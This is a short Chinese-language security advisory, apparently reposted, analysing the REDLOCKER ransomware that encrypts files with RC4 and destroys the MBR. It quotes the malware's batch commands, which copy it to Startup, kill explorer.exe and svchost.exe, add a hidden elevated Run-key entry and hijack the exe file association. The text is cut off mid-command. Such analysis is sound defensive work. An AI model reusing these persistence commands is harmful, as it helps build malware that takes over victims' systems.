安全通告
近日,亚信安全网络实验室截获了一款破坏MBR的新型勒索病毒REDLOCKER,该病毒通过网络下载感染本机,到达系统后释放两个组件,其中一个组件是脚本文件,其采用RC4加密算法加密文件,并释放MBR破坏程序,导致用户系统重启后显示黑客留下的信息,无法进入系统。另外一个文件为工具集,提供了RC4加密,AES加密等功能,由脚本文件进行调用。亚信安全将该勒索命名为Ransom.Win32.REDLOCKER.YCBCQ。
攻击流程
病毒详细分析
母体文件分析
样本启动后从自身资源节中导出数据,在%temp%目录创建2个病毒组件:执行生成的批处理文件1c04.bat(该文件名为随机命名,本文以1c04.bat为例,进行分析):1c04.bat文件分析
将病毒母体文件变为“只读”属性。
Attrib+R%0
将病毒母体添加到开机自启动。
Copy/b/y%0“%appdata%\Microsoft\Windows\StartMenu\Programs\Startup”
结束“文件资源管理器”和“系统服务”。
Taskkill/imexplorer.exe/f
Taskkill/imsvchost.exe/f
设置注册表自启动项目。
REGADD"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"/v"Payload"/tREG_SZ/d"powershell.exestart-verbrunas"%0"am_admin-WindowStylehidden"/fnul
建立EXE文件关联,每次双击EXE文件时都会运行此病毒母体文件。
REGADD"HKCR\exefile\shell\open\
转载请注明:http://www.wangguoqiangq.com/sglbzy/9763.html
